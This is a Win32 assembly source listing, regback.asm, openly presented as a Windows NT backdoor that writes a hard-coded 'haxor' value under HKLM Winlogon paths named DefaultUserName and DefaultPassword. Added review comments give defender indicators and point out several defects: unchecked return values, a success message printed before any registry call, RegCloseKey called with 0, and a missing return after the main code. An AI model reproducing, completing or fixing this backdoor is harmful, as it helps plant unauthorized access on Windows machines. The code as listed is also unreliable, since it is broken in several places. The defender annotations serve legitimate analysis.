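regback.asm is a backdoor for Windows NT written in pure assembly (TASM). As listed, it prints a banner and then writes a hard-coded value under two Winlogon-related registry key paths in HKEY_LOCAL_MACHINE.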
bd616e1d07cd327035e514a318277f4e261bebd2ecf13fd9c7c0b7b66b029a75
;tasm32 -ml regback.asm
;tasm32 -Tpe -x -c regback.obj ,,, import32
;write by asmbeginer.com
;www.asmbeginer.com/backdoor/
.386p
locals
jumps
.model flat, stdcall
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA : Proc
extrn RegCloseKey : Proc
.data
; NOTE(review): several string literals in this listing are wrapped across
; lines as found on the page; the definitions below are left exactly as found.
;
; Banner text written to the console at startup: three db lines, the last
; one ending in CR, LF and a 0 byte.
logo db "-------------------- R.E.G.B.A.C.K
---------------------------------", 13, 10
db "Write by: ASMBEGINER.COM, why? just for fun and because i have
no job ", 13, 10
db
"----------------------------------------------------------------------",
13, 10, 0
; Banner length in bytes; because it is computed here it includes the
; trailing 0 byte.
logolen equ $-logo
; Status text. As written it ends with two carriage returns (13,13) and has
; no terminating 0; its length comes from accountlen.
account db "Account ok !",13,13
accountlen equ $-account
; Console handles stored by init_console, and the dword that receives the
; character count from WriteConsoleA.
console_in dd ?
console_out dd ?
bytes_read dd ?
; Predefined root key handle: 80000002h is HKEY_LOCAL_MACHINE.
hKey dd 80000002h
; Key paths handed to RegCreateKeyExA as lpSubKey. For defenders, these
; literal path strings are usable as static indicators and as registry-audit
; targets (writes below a Winlogon path in HKLM).
lpSubKey db
'\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultUserName', 0
lpSubKey2 db
'\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultPassword', 0
; Byte count passed to RegSetValueExA as cbData (5). The lpData buffer below
; is 9 bytes including its 0 terminator, so only its first 5 bytes are
; described to the API.
cbData dd 05h
lpData db '01010101',0
; Value names passed to RegSetValueExA; both are the same hard-coded string.
lpValueName db 'haxor', 0 ; login
lpValueName2 db 'haxor', 0 ; password
; Receives the key handle from RegCreateKeyExA (reused for both calls).
phkResult dd 0
; Receives the disposition value from RegCreateKeyExA; never read afterwards.
lpdwDisposition dd 0
.code
; Program entry point (stdcall; arguments are pushed right to left).
; Prints the banner and a status line, then performs two registry writes
; under HKEY_LOCAL_MACHINE. No return value from RegCreateKeyExA or
; RegSetValueExA is checked, and "Account ok !" is printed before any
; registry call is made, so the message does not indicate success.
; Defender notes: the observable behaviour is key creation / value set under
; the two lpSubKey paths in HKLM with value name 'haxor' and type REG_SZ.
; NOTE(review): writing below HKLM\SOFTWARE normally needs elevated rights;
; confirm against the target OS before relying on this for triage.
start:
call init_console
; write_console(offset logo, logolen)
push logolen
push offset logo
call write_console
; The console handles are fetched a second time before the status line.
call init_console
; write_console(offset account, accountlen)
push accountlen
push offset account
call write_console
; "login" write: RegCreateKeyExA(hKey, lpSubKey, 0, 0, 0, samDesired, 0,
;                                &phkResult, &lpdwDisposition)
push offset lpdwDisposition
push offset phkResult
push 0
; samDesired = 1F0000h (STANDARD_RIGHTS_ALL) + 1 (KEY_QUERY_VALUE)
;            + 2 (KEY_SET_VALUE)
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset lpSubKey
push hKey
call RegCreateKeyExA
; RegSetValueExA(phkResult, lpValueName, 0, 1 = REG_SZ, lpData, cbData)
push cbData
push offset lpData
push 01h
push 0
push offset lpValueName
push phkResult
call RegSetValueExA
; "password" write: same call sequence with lpSubKey2 / lpValueName2.
; phkResult is overwritten here; the first handle has not been closed.
push offset lpdwDisposition
push offset phkResult
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset lpSubKey2
push hKey
call RegCreateKeyExA
push cbData
push offset lpData
push 01h
push 0
push offset lpValueName2
push phkResult
call RegSetValueExA
; RegCloseKey is called with 0, not with the handle stored in phkResult.
push 0
call RegCloseKey
; No ret or ExitProcess follows; the next code in the listing is
; init_console. The endp below has no matching proc in this listing.
endp
;-----------------------------------------------------------------------
; init_console
; ABI:   Win32 stdcall, no arguments.
; Out:   console_in / console_out hold the handles returned by
;        GetStdHandle(-10) and GetStdHandle(-11).
; Note:  only a zero return is treated as failure; in that case the
;        process is ended through ExitProcess(0).
; Clobb: eax, flags (plus whatever the API calls clobber).
;-----------------------------------------------------------------------
STD_INPUT_HANDLE equ -10
STD_OUTPUT_HANDLE equ -11
init_console proc
; standard input handle
push STD_INPUT_HANDLE
call GetStdHandle
test eax, eax
jz init_error
mov console_in, eax
; standard output handle
push STD_OUTPUT_HANDLE
call GetStdHandle
test eax, eax
jz init_error
mov console_out, eax
ret
init_error:
; a handle came back as zero: leave with exit code 0
push 0
call ExitProcess
endp
;-----------------------------------------------------------------------
; write_console(text_out, text_len)
; ABI:   Win32 stdcall.
; In:    text_out = address of the text, text_len = number of characters.
; Does:  WriteConsoleA(console_out, text_out, text_len, &bytes_read, 0)
; Note:  all general registers are saved and restored around the call, so
;        the API result in eax is discarded and never checked.
;-----------------------------------------------------------------------
write_console proc text_out:dword, text_len:dword
pushad
; arguments right to left
push 0
push offset bytes_read
push text_len
push text_out
push [console_out]
call WriteConsoleA
popad
ret
endp
end start